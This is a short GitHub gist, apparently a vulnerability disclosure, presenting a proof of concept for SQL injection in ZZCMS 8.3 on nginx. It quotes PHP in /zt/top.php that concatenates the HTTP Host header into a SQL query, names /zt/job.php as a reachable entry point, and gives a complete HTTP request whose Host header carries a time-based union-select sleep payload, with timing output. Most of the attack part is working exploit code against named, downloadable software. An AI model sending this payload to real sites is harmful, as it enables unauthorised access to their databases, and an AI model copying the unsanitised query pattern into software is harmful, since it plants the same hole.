Skip to content

Instantly share code, notes, and snippets.

@Lz1y

Lz1y/zzcms_sqlinject.md Secret

Last active Aug 9, 2018
Embed
What would you like to do?

ZZCMS sqlinject in nginx server

PoC by Lz1y

ZZCMS the lastest version download page :

http://www.zzcms.net/about/6.htm

zip installer:

http://www.zzcms.net/download/zzcms8.3.zip

vulnerability code:

in file "/zt/top.php", line 5

<?php
//echo $_SERVER['REQUEST_URI'];
$editor=isset($_REQUEST['editor'])?$_REQUEST['editor']:'';
$editor=substr($_SERVER['HTTP_HOST'],0,strpos($_SERVER['HTTP_HOST'],'.'));//从二级域名中获取用户名
$rs=query("select * from zzcms_userdomain where domain='".$_SERVER['HTTP_HOST']."' and passed=1 and del=0");//从顶级级域名中获取用户名
$row=num_rows($rs);
if (!$row){
	$row=fetch_array($rs);
	$editor=$row["username"];
}
$id=isset($_REQUEST['id'])?$_REQUEST['id']:0;
checkid($id,1);
...

in line 5,coder use $_SERVER['HTTP_HOST'] in sql code,and this variable can be controled by attacker in nginx. So,just find a page that include /zt/top.php ,like /zt/job.php:

<?php
include("../inc/conn.php");
include("../inc/fy.php");
include("top.php");
include("bottom.php");
include("left.php");
...

POC:

GET /zt/job.php?id=0&editor=aa HTTP/1.1
Host: xxxx.com' union select sleep(5),0,0,0,0-- '
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 
Connection: close

debug info

sleep(5)

sleep(1)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.